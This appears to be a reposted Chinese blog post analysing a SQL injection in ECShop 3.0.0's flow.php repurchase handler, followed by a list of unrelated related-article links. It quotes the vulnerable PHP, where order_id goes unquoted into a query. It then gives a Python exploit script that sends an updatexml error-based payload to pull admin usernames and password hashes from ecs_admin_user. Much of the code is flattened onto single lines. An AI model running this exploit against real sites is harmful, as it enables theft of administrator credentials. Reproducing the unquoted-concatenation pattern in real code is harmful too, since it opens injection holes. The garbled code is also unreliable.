ecshop3.0.0注入
配个环境来演示给别人看。。分析一下。flow.php文件缺陷,order_id在post请求没有单引号保护。造成注入
<?php
elseif ($_REQUEST['step'] == 'repurchase') {include_once('includes/cls_json.php');$order_id = strip_tags($_POST['order_id']);$order_id = json_str_iconv($order_id);$user_id = $_SESSION['user_id'];$json = new JSON;$order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);if (!$order) {$result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);die($json->encode($result));}$db->query('DELETE FROM ' .$ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);$order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);$result = array('error' => 0, 'message' => '');foreach ($order_goods as $goods) {$spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) {$result = false;$result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);}}die($json->encode($result));
}
ecshop3.0.0注入检测脚本:(无聊写了个脚本)
#coding:utf-8
#ecshop 3.0.0 flow.php sql injection
#author:jwong import requests
import re
import sysdef get_md5(url):headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0"}payload = {"order_id":"1 or updatexml(1,(select concat(0x3a,user_name,0x3a,password,0x3e) from ecs_admin_user),1)#"}urls = url + '/flow.php?step=repurchase'req = requests.post(urls,data=payload,headers=headers)print req.contentif req.status_code == 200 and req:pattern = re.compile("XPATH syntax error: '(.*?)'")info = re.findall(pattern,req.content)[0]new_list = info.split(':')password = new_list[-1]username = new_list[1]print username + ':' + passwordif __name__ == '__main__':if len(sys.argv) < 2:print 'usage python ecshop.py url'exit()url = sys.argv[1]if 'http://' not in url:url = 'http://' + urlget_md5()
转载于:https://www.cnblogs.com/whoami101/p/5848921.html
ecshop3.0.0注入相关推荐
- Spring 3.0 注解注入详解
Spring 3.0 注解注入详解 2011-04-15 09:44 17ZOUGUO ITEYE博客 我要评论(1) 字号:T | T AD: 一.各种注解方式 1.@Autowired注解(不推荐 ...
- (Activiti6.0.0)SpringProcessEngineConfiguration配置bean时属性注入不了,问题已经找到
SpringProcessEngineConfiguration配置bean时属性注入不了 我用Spring搭建了个activiti的项目,但是在配置 org.activiti.spring.Spri ...
- OSPF 协议中的一个普通区域通过ASBR 注入192.168.0.0/24~192.168.3.0/24 共4 条路由,在ABR 中配置聚合为一条聚合路由192.168.0.0/22,此时ABR 会
OSPF 协议中的一个普通区域通过ASBR 注入192.168.0.0/24~192.168.3.0/24 共4 条路由,在ABR 中配置聚合为一条聚合路由192.168.0.0/22,此时ABR 会 ...
- ECShop-v3.0.0漏洞复现
ECShop-v3.0.0漏洞复现 配置文件写入导致代码执行 HTTP Host头部攻击导致任意页面跳转 HTTP Host头部攻击导致前台任意密码重置 后台任意文件删除 后台SQL注入 配置文件写入 ...
- 探索SwitchYard 2.0.0.Alpha2快速入门
在我的最后一篇文章中,我解释了如何在WildFly 8.1上使用SwitchYard. 同时,该项目很忙,并发布了另一个Alpha2. 这是一个很好的机会,在这里浏览快速入门并刷新您的记忆. 除了版本 ...
- Spring XD 1.0.0.M5在这里!
Spring XD宣布发布Spring XD 1.0.0.Milestone 5 . 您可以从这里下载. 根据发布的Spring XD 1.0.0.M5 ,Spring XD是用于实时分析,批处理,数 ...
- Jeecg-Boot 2.0.0 版本发布,基于Springboot+Vue 前后端分离快速开发平台
Jeecg-Boot 2.0.0 版本发布,前后端分离快速开发平台 Jeecg-Boot项目简介 源码下载 升级日志 Issues解决 v1.1升级到v2.0不兼容地方 系统截图 Jeecg-Boot ...
- 体验 正式发布 的OSM v1.0.0 版本
2021年10月份发布了OSM 1.0 RC[1],在过去的几个月里,OSM 的贡献者一直在努力为 v1.0.0 版本的发布做准备.2022年2月1日,OSM 团队正式发布 1.0.0 版本[2].O ...
- c basic library framework - simplec 2.0.0
前言 - simplec 单元测试 流程介绍 一个关于C基础库 simplec 2.0.0 发布了. 详细的文档介绍请参照 README.md. 说的再多都无用, 抵不上 gdb 一个 b r n. ...
最新文章
- vue中动态渲染组件
- linux 环境变量 export PATH和PATH有什么区别?
- MyBatis中编写sql语句小于号报错
- hdu2457 Trie图+dp
- 使用Spring Cloud Config作为外部化配置
- 【Objective-C】玩转OC:正式开始自学OC
- python学习1:注释\变量类型\转换函数\转义字符\运算符
- python自加_浅谈:为什么python没有自增运算符?
- NDK开发基础④增量更新之客户端合并差分包
- LordPE找不到进程
- 中望3d快捷键命令大全_中望CAD快捷键全集
- androidstudio图片居中_Android imageView图片按比例缩放-Fun言
- 提升技术领导力实操指南
- MATLAB打开后一直在初始化,或者初始化很慢问题
- 语音助手——多轮会话(理论概念篇)
- nn.Parameter()
- 《TCP/IP具体解释卷2:实现》笔记--选路请求和选路消息
- STM32上手-STWingSKIT_BC28学习笔记(一)环境搭建和LED灯点亮
- ShaderLearning_3_UnityShader基本架构
- springboot+jsp电子元件仓库管理系统javaweb